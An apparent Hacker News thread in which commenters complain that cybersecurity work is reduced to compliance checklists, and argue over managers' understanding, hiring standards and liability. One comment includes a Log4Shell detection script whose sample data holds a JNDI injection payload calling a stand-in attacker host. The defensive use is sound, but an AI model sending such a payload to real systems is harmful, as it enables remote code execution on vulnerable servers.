dmhmr|4 years ago
The past few years have soured me on how many organizations run cybersecurity in general. The industry is full of people who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and have barely a shred of technical aptitude; they struggle with basic fundamentals like inventory and patch management. It is a hard industry to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want insight into how the government really operates, look at the GAO reports; they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation
Bhilai|4 years ago
The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needed to be patched for the log4j vuln if it's not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user-controlled data.
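The point the PM missed is that any user-controlled string reaching a vulnerable Log4j logger is an attack vector, internet-facing or not: a logged value like `${jndi:ldap://...}` triggers a remote lookup on vulnerable versions. A minimal, illustrative Python sketch of a log-scanning heuristic (pattern and function names are my own, not from any particular tool):

```python
import re

# Log4Shell (CVE-2021-44228) abuses Log4j's ${...} lookup syntax: logging a
# string like ${jndi:ldap://attacker.example/a} causes a remote class load on
# vulnerable versions. A crude scan for that pattern in existing logs; note
# that obfuscated variants (e.g. ${${lower:j}ndi:...}) need fancier matching.
JNDI_PATTERN = re.compile(r"\$\{.*jndi:(ldap|ldaps|rmi|dns)", re.IGNORECASE)

def suspicious_lines(log_lines):
    """Return log lines containing a plausible JNDI lookup payload."""
    return [line for line in log_lines if JNDI_PATTERN.search(line)]

logs = [
    "GET /health 200",
    "User-Agent: ${jndi:ldap://attacker.example/a}",  # classic payload
    "login failed for user bob",
]
print(suspicious_lines(logs))  # only the User-Agent line matches
```

Note the payload arrives through an ordinary request header, which is exactly why "not internet facing" is irrelevant if the service logs data that originated from users.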
Look at the recent Azure vulns. I am pretty sure their internal security team knew about these, and after some back and forth some exec probably signed off on an exception. They would rather ship features than fix the mess they created. Most infosec folks have trouble getting teams to prioritize security work, and some of the blame falls on infosec teams too, for making everything sound like an end-of-the-world scenario. But did Azure lose a single customer, or did the stock price go down, or revenue drop? Nope. So what's the point of investing so much in security if the only real harm was some loss of reputation?
Even most security execs I have had a chance to interact with don't understand security topics properly, though they can certainly throw some jargon around in all-hands meetings and such. Unless they come from a security background, these execs often confuse security with compliance and, instead of investing in defense-in-depth techniques, look for check-boxes against security controls.
ziddoap|4 years ago
Paradoxically, when someone has a pure (or at least focused) cybersec program (a few 3-4 year programs are taught by reputable institutions near me), and a Sec+ or equivalent, all of the old guard shout about needing years of experience (decades preferably) before you should be allowed to even think about security.
It only takes a few days in r/cybersecurity or r/securitycareeradvice to see these people in action, yelling at kids coming out of a 4-year university course focused on cybersec to "put in their dues" and work a call-center/help-desk for a few years resetting people's passwords before being allowed the honor of applying to an "entry-level" security position.
If a 4 year program cannot prepare you for an entry-level position, either the program is broken or the hiring expectations are broken.
Just in this thread someone was saying they would require 10 years of system administration AND 5 years of security experience before considering hiring someone. In the same amount of time you could become a doctor or lawyer, and be operating on people or running your own law firm.
bluedino|4 years ago
Part of the problem is the for-profit schools and bootcamps cranking out 'cyber security' graduates. They know the least of all the people I interview. How can you pretend to know anything about cybersecurity when you don't actually know anything about programming or networking?
The classes cover buzzwords like vishing/phishing/smishing, you run Kali Linux and 'hack' something, and then you get your certificate.
Mountain_Skies|4 years ago
I got a lot of good mileage out of explaining the Equifax Struts vulnerability, which allowed attackers to move freely through Equifax internally once outer security was breached because internal security controls, especially around patching, were so weak. Might be worth trying if you encounter the same situation again.
sawmurai|4 years ago
So much this. I once failed a security review because an API would respond with HTTP 422 on invalid input. When I asked why that is a security issue, I got shut down with “defense in depth”. After a longer discussion, the actual objection turned out to be that 422 was not part of “the original HTTP spec” but came from an extension (WebDAV, RFC 4918 — not LDAP, as the reviewer claimed).
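For the record, 422 Unprocessable Entity is a standardized, legitimate response for input that parses but fails validation, distinct from 400 for malformed requests. A hedged sketch of that distinction (the handler and field names are hypothetical, just to show the pattern the reviewer objected to):

```python
import json

def handle_create_user(body: str):
    """Hypothetical API handler: 400 for malformed JSON,
    422 for well-formed JSON that fails semantic validation."""
    try:
        data = json.loads(body)
    except ValueError:
        # The request itself is unreadable.
        return 400, {"error": "malformed JSON"}
    email = data.get("email")
    if not isinstance(email, str) or "@" not in email:
        # The request parsed fine, but its content is invalid.
        return 422, {"error": "invalid email"}
    return 201, {"created": email}

print(handle_create_user("{not json"))               # 400
print(handle_create_user('{"email": "nope"}'))       # 422
print(handle_create_user('{"email": "a@b.example"}'))  # 201
```

There is nothing insecure about this; if anything, returning a precise validation status without echoing internals back is the well-behaved option.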
908B64B197|4 years ago
Here's the issue: cybersecurity is seen as a cost center. As long as it's viewed as a cost center, good CS programs won't care about it, which means right now it's relegated to certificates and extension schools... and we all know what that means.
If companies/governments start caring for cybersecurity, ie, create a prestigious and visible organization that directly reports to the White House for instance, then you'll see the good CS degrees adding more of it to their curriculum.
> The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for log4j vuln if its not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user controlled data.
I remember being in a room like that. At one point several people were arguing and the lead engineer just tapped his brass rat on the table to get everyone's attention. I remember the PM was furious but what was he going to do? They don't sell those at the gift shop...
Truth is, PM orgs need to exist in a parallel way to engineering orgs. PMs managing engineers is a red flag, and a true tech company should ideally have engineers all the way to the CEO position. So if there's security work and engineering deems it necessary, it's done no matter what some non-technical employee thinks.
Engineers could honestly take a page from MDs here. Opinions of non-MDs are basically regarded as irrelevant...
phoehne|4 years ago
I once had to argue back and forth with someone (circa 2008) about whether JavaScript counted as "mobile code" in the sense of their checklist. I had to explain what JavaScript was and how it worked, but they were still more than willing to tell me I had to remove it from the app I was working on, which would have rendered my app, and all the other apps for that client, much less functional.
golergka|4 years ago
What the hell does that even mean?
markus_zhang|4 years ago
Of course the mainstream stuff is tolerated, but anything outside of that needs a long list of approvals.
ransom1538|4 years ago
Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.
vsareto|4 years ago
I don't agree that it takes 15 years though. I think you're setting the standards way too high for no good reason, especially for "decent".
mistrial9|4 years ago
The imaginary skilled professional you are describing clearly originates in the mind of an engineering worker: a person gains skill through experience and is promoted. This is the opposite of what management builds over time. Management specifically and exactly destroys this career path because it costs them more money. As long as you can commoditize and outsource, you drive costs down, not up.
Meanwhile, it is "eternal September" in the job world, with streams of 20-somethings lining up to get into the market. Add lower-cost engineers, for example in Eastern Europe, South East Asia and South Asia. Rinse and repeat.
lol768|4 years ago
When I was working in infosec consulting, by far the best colleagues were those who had software engineering experience and could empathise with developers at the client in order to understand how systems would be built, where corners might be cut, which areas might be more ropey than others etc (and then use that understanding to help inform their thinking from an attacker's perspective).
You could tell at interview too - the folks with a Computer Science background and a side interest in security were much, much better than those who took the dedicated-cyber-security degree/masters route.
You absolutely need a real generalist for security. That said, I don't think it's unreasonable to expect a developer to know about CIDR notation, networking and cloud systems, though we're perhaps straying into more DevOps-style roles.
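The CIDR expectation really is a low bar; Python's standard library covers it. A quick illustration of what "knowing CIDR notation" means in practice (addresses are made up):

```python
import ipaddress

# A /20 means the first 20 bits are the network prefix, leaving 12 host
# bits: 2**12 = 4096 addresses in the block.
net = ipaddress.ip_network("10.0.16.0/20")

print(net.num_addresses)                            # 4096
print(ipaddress.ip_address("10.0.31.255") in net)   # True: last address in the block
print(ipaddress.ip_address("10.0.32.0") in net)     # False: first address of the next /20
```

Being able to answer "is this IP inside that subnet?" is exactly the kind of fluency that separates developers who can reason about firewall rules and security-group scoping from those who can't.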
johngalt|4 years ago
Sysadmin/ops has too many offramps that drain talent before year 10. If you can integrate software and systems well, manage projects, or do advanced troubleshooting, you will likely be pulled out of ops. Conversely, there is an ocean of security certifications being issued to people who have very little operational or technical experience.
Data security in practice is being reduced to a policy and procedure checklist. It is frustrating for an engineering group to receive non-specific or contradictory policy guidelines written by non-technical people, but I have yet to see that change hiring or decision making. Businesses want someone who will agree to check the box. If that someone doesn't know all the details, that makes checking the box easier.
The future of cybersecurity is not a skilled coordinator/PM but yet another non-technical management arm handing down mandates that are blind to technical reality. There isn't another option: there aren't enough people to meet demand, and the compensation for cybersecurity positions is often less than for a senior infrastructure role. How many sysadmins really understand networking, programming, databases, etc., while also having the people skills not to alienate both management and highly technical development and operations teams? We will never have enough people at the intersection of that many skills.
ziddoap|4 years ago
This points to two issues: education needs to be addressed with more input from industry, and expectations for hiring need to be realistic. 10 years before you're able to work on something security related is not realistic, nor is it sustainable.
markus_zhang|4 years ago
But I do believe that for an entry-level position you don't need 15 years. Maybe 5 years of sysadmin or devops should be good enough.
horsawlarway|4 years ago
The entire industry plays a game of:
- Create a checklist (or use an existing checklist - ex: FIPS)
- Check off all the boxes on the checklist (any way they can - however they can, with complete and utter disregard for the spirit of the checklist)
- Confirm with legal that checklist is complete
- Advertise that they are "secure" to customers who happen to care (not many do, honestly) and present them with the required completed checklists
- Get hacked LEFT AND RIGHT because the whole fucking game has nothing to do with security, and everything to do with liability.
- When they're hacked, whip out the checklist again and go "couldn't have been our fault! we followed the checklist."
Repeat.
----
Now - software security is hard. Unfathomably hard to most people (as in, they literally don't understand). People STILL fail to realize that software security is not like building a bridge - I see it even here on HN, where folks spout off bullshit comparisons to things like restaurant health/safety inspections or architectural reviews.
The difference is that the bridge is not constantly being assaulted by an intelligent, evolving, malicious, human force. The software usually is.
And the security team can't just win one battle - they have to win every battle. Whether that's old systems, or a tired employee clicking an email link.
So I think you're basically between a rock and a hard place as an honest security worker. The job is literally impossible - so the folks who make money are the ones who compromise fastest and check off the most checklists (again - spirit of the checklist be damned).
I think the ballooning insurance payments (and the obvious eventual halt to offering cybersecurity insurance) will eventually bring the whole house of cards down, but we're still a few years out from that.
markus_zhang|4 years ago
Well, maybe more checklists and consultants.
vipa123|4 years ago
It may not make more revenue but poor security certainly affects profits.
stef25|4 years ago
Fines would therefore be the obvious solution to the lack of cybersecurity. Network breach / data leak due to not patching software x days after vuln disclosure? Here's your fine!
CommanderData|4 years ago
The reasoning was we probably don't use base64. I was amazed.
antihero|4 years ago
Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.
Of course, if your company is private and the shareholders are decent enough people to make sure the board is doing things properly, this can work. With public companies I don't see how it is remotely feasible.
We have to legislate to compel companies to do this and expand the definition of negligence, which is itself quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box-checking behaviour on their watch. It is the only way.